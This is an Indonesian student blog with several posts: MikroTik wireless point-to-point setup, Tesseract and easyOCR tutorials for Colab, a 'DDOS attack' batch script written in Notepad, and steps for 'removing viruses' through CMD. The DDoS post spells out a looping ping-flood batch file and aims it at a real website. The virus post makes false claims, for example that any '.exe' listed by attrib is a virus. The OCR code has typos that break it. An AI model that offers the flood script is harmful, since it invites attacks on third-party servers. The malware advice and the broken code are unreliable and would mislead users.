Saturday, January 16, 2021

Point to Point dengan WLAN di Mikrotik [dj-SERVER & dj-WIFI + pass mautauajah] - [TUGAS]

Hal-hal yang perlu dipersiapkan untuk mempraktekkannya :
  • Komp/PC (2)
  • Mikrotik
  • Kabel UTP [kabel LAN] - (2)
  • App Winbox
[ yg kotak putih = "Mikrotik" &
kabel biru = "kabel LAN" ]

.
.
.
.
.

.
.
.
.
.

Point to Point dengan WLAN di Mikrotik
[ dj-SERVER ]

1)
Pasang mikrotik beserta kabelnya sesuai topologi masing-masing PC → kabel LAN milik PC tak usah dipasang

2)
buka apk winbox + Connect-kan

3)
Reset Configuration :
System + Reset Configuration + centang no default + OK

4)
Keluar + Masuk ke winbox + tunggu beberapa saat hingga MAC-add nya muncul. Lalu connect-kan kembali

5)
Beri nama winbox sesuai dengan nama mikrotik-nya. Contoh kami memakai mikrotik "R9"
System + Identity + R-9 + OK



6)
Beri nama masing-masing topologi : (gambar di no.7)
[ ether2-pca ]
[ ether3- pcb ]

7)
Aktifkan WLAN1 :
Interface + klik wlan1 nya lalu klik centang biru + klik 2x wlan1 + wireless + Advanced Mode + Mode : station bridge + SSID : dj-server + Scan... + Interface : wlan1 + Start + cari & klik ARB dengan dj-server + Connect & muncul status "R"



8)
Scanning Server Hotspot :
IP + DHCP Client + "tambah" biru + Interface : wlan1 (centang semua) + Apply + OK & tunggu hingga muncul status "bound"



9)
Pasang IP-add mikrotik dan di masing-masing PC
Mikrotik :
  • IP + Address + "tambah" + Address : 105.10.10.232/24 & Interface : wlan1 + Apply + OK 

  • "tambah" + Address : 192.168.10.50/25 & Interface : ether2-pca + Apply + OK → PCA
  • "tambah" + Address : 192.168.20.35/27 & Interface : ether3-pcb + Apply + OK → PCB



PCA :
  • IP-add : 192.168.10.123 + Subnet mask : 255.255.255.128 + Default gateway : 192.168.10.50 + Prefered DNS server : 8.8.8.8 
PCB :
  • IP address : 192.168.20.38 + Subnet mask : 255.255.255.224 + Deafault gateway : 192.168.20.35 + Preferred DNS server : 8.8.8.8



10)
Konfigurasi DNS & NAT 
DNS :
  • IP + DNS + Servers : 8.8.8.8 (centang Allow Remote Requests) + Apply + OK
NAT :
  • IP + firewall + NAT + “tambah” + General + Out Interface : wlan1 + Action + Action : masquerade + OK


11)
Tes ke internet di mikrotik (ping google.com) dan di web
Mikrotik (New Terminal) :


Web :



!! BERHASIL !!

.
.
.
.
.

Point to Point dengan WLAN di Mikrotik
[ dj-WIFI + pass mautauajah ]

1)
Kerjakan langkah 1 - 5

2) 
Untuk bagian aktifkan WLAN1, sama dengan langkah ke-6. Hanya djserver diganti dengan @dj-wifi dan pastikan Security Profile = profile1



 3)
Koneksi PTP ke Server :
Wireless + Security Profiles + “tambah” + General + “Name : profile1 (centang semua kecuali Disable PMKID) + WPA Pre-Shared Key : mautauajah + WPA2 Pre-Shared Key : mautauajah + Apply + OK



4)
Kerjakan langkah 7 - 9

5)
Tes koneksi di mikrotik (ping google.com) dan web





!! BERHASIL !!

:D

Tesseract [TUGAS]

 Berikut perintah-perintahh tesseract → Google  Colab 

Untuk gambar, saya pake gambar ini dengan nama "ELSA"



1)
!sudo add-repository ppa:alex-p/tesseract-ocr


[ jika ada "ENTER", yaaa pencet Enter ]


2)
!sudo apt-get update



3)
!sudo apt install tesseract-ocr




4)
!sudo apt install libtesseract-dev





5)
!sudo pip install pytesseract



6)
from google.colab import files
uploaded = files.upload()



7)
import cv2
import numpy as np
from PIL import Image
import pyesseract
import requests
import time



8)
filename = 'ELSA.jpg'



9)
start = time.time()
def get_string(img_path):
    img = cv2.imread('ELSA.jpg')
    img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)

    #menghapus noise menggunakan dilation dan erode
    kernel = np.ones((1,1), np.uint8)
    img = cv2.dilate (img, kernel, iterations=1)
    img = cv2.erode (img, kernel, iterations=1)

    cv2.imwrite(img_path,img)

    #mengenal text dengan tesseract python
    result = pytesseract.image_to_stringImage.open(img_path))

    return result
print (get_string(filename))
end = time.time()
print ("total waktu proses", end-start, "Detik")


[ untuk dibagian ini, yang tulisannya "berjarak", setelah Enter klik/pencet "Tab" ]



FINISH


















Thursday, January 14, 2021

Cara Membuat DDOS ATTACK Melalui Notepad

Perintah-perintah yang harus di tulis/ketik di Notepad :

1)
@echo off + Enter
[ "echo off" gunanya untuk tidak menampilkan perintah-perintah command prompt ke layar. Dan sebaliknya ]

2)
(4x spasi) mode 70,20 + Enter
[ "mode" = ukuran, jadi terserah kalian mau berapa ]

3)
(4x spasi) title DDOS Attack by KEPO LU TAU NAMAKU ;D + Enter 
[ untuk nama terserah kalian, di sini saya make nama "DDOS Attack by KEPO LU TAU NAMAKU :D" ]

4)
(4x spasi) color B + Enter 
[ untuk warna juga terserah kalian, asal perintahnya seperti di CMD → color a, color b, color c, color A, color B, color 1, color 2, dll ]

5)
(4x spasi) cls + Enter
[ "cls" gunanya untuk menghapus/membersihkan layar ]

6)
(4x spasi) echo. + Enter

7)
(4x spasi) echo DDOS With Batchfile + Enter
[ di sini "echo" berfungsi menampilkan tulisan dan tulisan itu nanti akan muncul di kalimat pertama, jadi terserah aja namanya mau gimana ]

8)
(4x spasi) echo. + Enter

9)
(4x spasi) set /p x=Server-Target: + Enter
[ "Server-Target" adalah berupa nama saja. Saya menulis seperti itu yaaaaa biar ada identitasnya lah wkwk... ibaratkan itu nama server yang mau kita isi nanti. Kalau misalkan mau pake nama lain juga bisa :) ]

10)
(4x spasi) echo. + Enter

11)
(4x spasi) ping %x% + Enter

12)
(4x spasi) @ping.exe 127.0.0.1 -n 5 -w 1000 > nul + Enter
[ 127.0.0.1 = "loopback address" ]

13)
(4x spasi) goto Next + Enter

14)
(4x spasi) :Next + Enter

15)
(4x spasi) echo. + Enter

16)
(4x spasi) echo. + Enter

17)
(4x spasi) echo. + Enter

18)
(4x spasi) set /p m=ip Host: + Enter

19)
(4x spasi) echo. + Enter

20)
(4x spasi) set /p n=Packet Size: + Enter

21) 
(4x spasi) echo. + Enter

22)
(4x spasi) :DDOS + Enter

23)
(4x spasi) color 4 + Enter
[ color 4 = warna merah. Warna merah ini nanti akan muncul ketika DDOS berjalan ]

24)
(4x spasi) echo Attacking Server %m% + Enter

25)
(4x spasi) ping %m% -i %n% -t >nul + Enter

26)
(4x spasi) goto DDOS + Enter


27)
Simpan notepad nya 



[ untuk nama file nya serah kalian aja, asalkan nama file nya adalah ".bat" dengan tipe file "All Files" ]

.
.
.
.
.
*UJI COBA*

1)
Silahkan buka file yang telah disimpan  

warna Light Aqua [color B] ]

2)
Silahkan kalian ketik disitu server/web mana yang ingin kalian attack-kan. Sebagai contoh, saya meng-attack-kan "GOOGLE", maka :
www.google.com + Enter

[  jangan gunakan http / https / url ; cukup dengan "www" dan "com" ]


3)
Silahkan isi IP Host dengan IP Add yang sudah ada/muncul di situ "[***.***.**.***]" dengan menaruh "ping" di depannya + di bagian Packet Size menunjukkan jumlah paket 'Attack' yang mau kalian kirimkan, jadi terserah aja mo berapa :
a) ping ***.***.**.*** + Enter
b) 1000000000000000000 + Enter


4)
Setelah di 'Enter', akan tampil seperti ini dengan warna merah [color 4]:




FINISH
.
.
.
.
Untuk menghentikan prosesnya, cukup dengan melakukan :

Ctrl + C + y + Enter

atau cara kedua, silahkan Exit aja

:")





Wednesday, January 13, 2021

Cara Menghapus Virus Melalui CMD

Perintah-perintah yang dilakukan untuk menghapus virus lewat CMD, adalah sebagai berikut :

1)
Windows + cmd + OK

2)
cd/ + Enter




3)
attrib + Enter 


[ bila di situ terdapat tulisan ".exe" , maka itu adalah virus ]

4)
netstat -ano + Enter





[ bila ada tulisan "LISTENING", itu baik dan komp/laptop sedang baik-baik saja. Kalau misalkan ada tulisan selain LISTENING, maka itu kurang baik ]

5)
attrib -s -r -h /s /d + Enter




6)
Tunggu saja sampai seperti ini 



FINISH





















thx buat :          

@WahyuWandi




Tuesday, January 5, 2021

easyOCR [TUGAS]

 Berikut perintah-perintah easyOCR : → Google Colab ←


1)
from google.colab import files
uploaded = files.upload()

[ selesai di "run" akan muncul "browse/choose file" - tergantung pakai web yang mana; di sini saya pakai di 'firefox' - klik di "browse" dan pilih mau pakai gambar yang mana, asalkan gambar nya berupa teks; karna easyOCR memprogram gambar berupa teks ]


2) 
!pip install easyocr 
[ untuk yang tak bisa/tidak terdapat "easyOCR" di google colab, harap di install terlebih dahulu ]

[ sampe selesai - succesfully - ]


3)
import matplotlib.pylot as plt
import cv2
import easyocr
from IPython.display import Image
from pylab import rcParams



4)
reader = easyocr.Reader(['en'])



5)
Image ("captcha.png")

[ ini adalah contoh gambar yang saya pake ]


6)
output = reader.readtext ("captcha.png")



7)
output



8)
output1 = reader.readtext ("captcha.png"), detail=0)
output1



9)
cord = output[-1][0]
x_min, y_min = [min(idx) for idx in zip (*cord) ]
x_max, y_max = max(idx) for idx in zip (*cord) ]



10)
rcParams['figure.figsize']=8,117
img = cv2.imread('captcha.png')
cv2.reactangle(img,(x_min,y_min),(x_max,y_max),(0,0,255),2)
plt.imshow(cv2.cvtColor(img, cv2.COLORBGR2RGB))




FINISH

 














(contoh) Membuat Surat Pengajuan Beasiswa Kampus - SuratPlus -

Berikut adalah langkah saya membuat surat pengajuan beasiswa kampus di situs SuratPlus [  https://suratplus.com/ ] Ingat.  Ini hanyalah con...